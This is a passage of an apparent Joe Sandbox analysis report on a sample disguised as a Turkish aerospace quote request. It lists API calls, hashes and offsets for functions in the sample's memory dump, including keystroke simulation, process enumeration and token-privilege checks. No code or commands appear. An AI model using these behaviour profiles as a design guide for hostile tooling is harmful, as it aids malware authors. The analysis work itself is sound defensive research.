                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                    • Opcode ID: 9f3e478d2cbe2a830c138e64ee48706153cd51caf4ef88c34bdfa6e56d398adb
                                                                                                                                    • Instruction ID: 032c59a9c1405b641d07749a976302c9503f6abd3693a7e326b84ae7a0fd0e5a
                                                                                                                                    • Opcode Fuzzy Hash: 9f3e478d2cbe2a830c138e64ee48706153cd51caf4ef88c34bdfa6e56d398adb
                                                                                                                                    • Instruction Fuzzy Hash: EB410B39600A14DFCB11EF15D544A5EBBE2AF99720B19C488E95AAB362CB34FD40CF91
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001A6D71,00000000,00000000,001A82D9,?,001A82D9,?,00000001,001A6D71,8BE85006,00000001,001A82D9,001A82D9), ref: 001BD910
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001BD999
                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001BD9AB
                                                                                                                                    • __freea.LIBCMT ref: 001BD9B4
                                                                                                                                      • Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                    • Opcode ID: 2082b86b6fd4bbe31c3ed69addad6742f5835b9cb045f8f32e1cdbabf73252a8
                                                                                                                                    • Instruction ID: d26abbc9556fab4853f4ef070e0ea287504da05dadc1e2cd46fc08a4adf433b0
                                                                                                                                    • Opcode Fuzzy Hash: 2082b86b6fd4bbe31c3ed69addad6742f5835b9cb045f8f32e1cdbabf73252a8
                                                                                                                                    • Instruction Fuzzy Hash: 8231BC72A0020AABDF299F64EC85EEE7BA5EB51314F154268FC04D7250EB35CD50CBA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00215352
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00215375
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00215382
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002153A8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3340791633-0
                                                                                                                                    • Opcode ID: 5dc527f7d41c2fcdcb12ed7fd5afa1f4704c7f66df0b1560332afbd01160cd97
                                                                                                                                    • Instruction ID: f4dc017a660a9eabb4314245abe4f0bc5aaa60acfa5a77cb1719cfdd847e7388
                                                                                                                                    • Opcode Fuzzy Hash: 5dc527f7d41c2fcdcb12ed7fd5afa1f4704c7f66df0b1560332afbd01160cd97
                                                                                                                                    • Instruction Fuzzy Hash: F331E634A75A29EFEB349E14DC05BE837E5ABA4390F5441C2FA20971E0C7F49DE0AB41
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 001EABF1
                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 001EAC0D
                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 001EAC74
                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 001EACC6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                    • Opcode ID: 08990334750f155c7aa153132e0678114322c0f31df561200bf505905c5d3b8e
                                                                                                                                    • Instruction ID: 46a57ea9fe70e17a4cb22611eaee0d95b61178f89adbc4a75615a64dd314ccee
                                                                                                                                    • Opcode Fuzzy Hash: 08990334750f155c7aa153132e0678114322c0f31df561200bf505905c5d3b8e
                                                                                                                                    • Instruction Fuzzy Hash: AE313930A40B986FEF34CB668C087FE7FA5AF95310FA8431AE485571D0C374A9858753
                                                                                                                                    APIs
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0021769A
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00217710
                                                                                                                                    • PtInRect.USER32(?,?,00218B89), ref: 00217720
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0021778C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                    • Opcode ID: a688231199140ed2fe0e116b56744ac411789ab147d0e7a15399aeef55658d93
                                                                                                                                    • Instruction ID: bccec3dd7a55615e5e0a0b19996620cd709ac552401c6a6dfdda0fcf26f6dfd1
                                                                                                                                    • Opcode Fuzzy Hash: a688231199140ed2fe0e116b56744ac411789ab147d0e7a15399aeef55658d93
                                                                                                                                    • Instruction Fuzzy Hash: E041AD38A15215DFCB01CF58D898EE9F7F5FBA9314F1480A8E4149B2A1C730E9A2CF90
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32 ref: 002116EB
                                                                                                                                      • Part of subcall function 001E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E3A57
                                                                                                                                      • Part of subcall function 001E3A3D: GetCurrentThreadId.KERNEL32 ref: 001E3A5E
                                                                                                                                      • Part of subcall function 001E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001E25B3), ref: 001E3A65
                                                                                                                                    • GetCaretPos.USER32(?), ref: 002116FF
                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 0021174C
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00211752
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                    • Opcode ID: 9ba6e7a204aa1e466b068d319960caf2daafc680796e97687e24b25540aa371a
                                                                                                                                    • Instruction ID: 40cc8c5bec253c7b443b7ca82b6fbba86019fb3cda1fb8028806b8b98e487909
                                                                                                                                    • Opcode Fuzzy Hash: 9ba6e7a204aa1e466b068d319960caf2daafc680796e97687e24b25540aa371a
                                                                                                                                    • Instruction Fuzzy Hash: CE315D75D00149AFDB00EFA9D8858EEBBF9EF58304B6080A9E515E7251DB319E45CFA0
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 001ED501
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 001ED50F
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 001ED52F
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001ED5DC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                    • Opcode ID: 5e25357bc2810b789f31a3417652135b03c0629dbfc38a1ef21886fbfb156ffd
                                                                                                                                    • Instruction ID: bb764770f4eef3a46fba917020aa7500a7ad7283d51cf479315f4fecb6d3fffe
                                                                                                                                    • Opcode Fuzzy Hash: 5e25357bc2810b789f31a3417652135b03c0629dbfc38a1ef21886fbfb156ffd
                                                                                                                                    • Instruction Fuzzy Hash: 4E31D4310083409FD304EF54E885ABFBBF8EFA9344F14092DF585871A1EB719A49CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00219001
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001D7711,?,?,?,?,?), ref: 00219016
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0021905E
                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001D7711,?,?,?), ref: 00219094
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                    • Opcode ID: 2cd16b3d28ec5cb65d2c6778bb6028beaba0fcca20874b929a106e66e21367bd
                                                                                                                                    • Instruction ID: 590ba3ac0c2896055f0f6af5f63cf619b51938b9d30817503de00268c02f8203
                                                                                                                                    • Opcode Fuzzy Hash: 2cd16b3d28ec5cb65d2c6778bb6028beaba0fcca20874b929a106e66e21367bd
                                                                                                                                    • Instruction Fuzzy Hash: BD21AD35610118AFCB25CF94D868FEA3BF9EB99361F104069F90557261C7319DE0DB60
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0021CB68), ref: 001ED2FB
                                                                                                                                    • GetLastError.KERNEL32 ref: 001ED30A
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 001ED319
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0021CB68), ref: 001ED376
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                    • Opcode ID: 5aacce4636d98cefde58f0d8ec4136ff93b285a49d16060baac7c9d8d11de685
                                                                                                                                    • Instruction ID: 387e1d226f27c01456a2303197a163b5096ce188d3731ca852847c1b0f1350bd
                                                                                                                                    • Opcode Fuzzy Hash: 5aacce4636d98cefde58f0d8ec4136ff93b285a49d16060baac7c9d8d11de685
                                                                                                                                    • Instruction Fuzzy Hash: BA21D3B45086019F8300EF25E8814AEB7E4FF66724F244A1DF499C72E1DB30DA45CB93
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001E102A
                                                                                                                                      • Part of subcall function 001E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001E1036
                                                                                                                                      • Part of subcall function 001E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1045
                                                                                                                                      • Part of subcall function 001E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001E104C
                                                                                                                                      • Part of subcall function 001E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1062
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001E15BE
                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 001E15E1
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E1617
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E161E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1592001646-0
                                                                                                                                    • Opcode ID: 73fa9177ef6e517b00c65be157de24f33e6a57d80369d5e487addc03e4bae560
                                                                                                                                    • Instruction ID: 06a202e58f6918a7ce0fc5ccdd695f7ad0c8777fb1578c9c52a57d6d25ff19d7
                                                                                                                                    • Opcode Fuzzy Hash: 73fa9177ef6e517b00c65be157de24f33e6a57d80369d5e487addc03e4bae560
                                                                                                                                    • Instruction Fuzzy Hash: BE216631E40608BFDF00DFA6C949BEEB7F8EF59354F188459E445AB241E770AA05CBA0
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0021280A
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00212824
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00212832
                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00212840
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                    • Opcode ID: ba2658c19faf8c4488f356d2fd2e91f4a29ecd69c72f909fd1c1c1ed05e7347a
                                                                                                                                    • Instruction ID: 62e0c7c66083a2862d9fe5a393047d521153742fc2cdf94afbd7a666b15c4a90
                                                                                                                                    • Opcode Fuzzy Hash: ba2658c19faf8c4488f356d2fd2e91f4a29ecd69c72f909fd1c1c1ed05e7347a
                                                                                                                                    • Instruction Fuzzy Hash: 1C21F435214111EFD7149B24D844FEABB95EF65324F248158F4268B2D2CB71FCA6CBD0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001E790A,?,000000FF,?,001E8754,00000000,?,0000001C,?,?), ref: 001E8D8C
                                                                                                                                      • Part of subcall function 001E8D7D: lstrcpyW.KERNEL32(00000000,?,?,001E790A,?,000000FF,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E8DB2
                                                                                                                                      • Part of subcall function 001E8D7D: lstrcmpiW.KERNEL32(00000000,?,001E790A,?,000000FF,?,001E8754,00000000,?,0000001C,?,?), ref: 001E8DE3
                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E7923
                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E7949
                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E7984
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                    • String ID: cdecl
                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                    • Opcode ID: e25b993cd00f7c35b6113ff191bb11a47352d546512e77454868e1d7fb87db63
                                                                                                                                    • Instruction ID: abc14888a7653a265cb9170ef7841e54210e948523a639cac05271d6b908eed7
                                                                                                                                    • Opcode Fuzzy Hash: e25b993cd00f7c35b6113ff191bb11a47352d546512e77454868e1d7fb87db63
                                                                                                                                    • Instruction Fuzzy Hash: 7411293A200782ABDF156F39DC44E7E77A5FF55364B10802AF806C72A5EF319811C751
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 002156BB
                                                                                                                                    • _wcslen.LIBCMT ref: 002156CD
                                                                                                                                    • _wcslen.LIBCMT ref: 002156D8
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00215816
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                    • Opcode ID: 4e07f421c6b270f642d2b6c9d47aa1184fa63603c820d01bb431e4bcc33b7ed8
                                                                                                                                    • Instruction ID: 9a51a2c5a79aaf9606eb0d85ecfbbf262788eae534157a56fe3d7b7c1cb441ac
                                                                                                                                    • Opcode Fuzzy Hash: 4e07f421c6b270f642d2b6c9d47aa1184fa63603c820d01bb431e4bcc33b7ed8
                                                                                                                                    • Instruction Fuzzy Hash: 7811E435620629D6DB209F61CC85AEE77ECBFB5364B1040A6F905D6081EBB089E0CBA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001E1A47
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001E1A59
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001E1A6F
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001E1A8A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
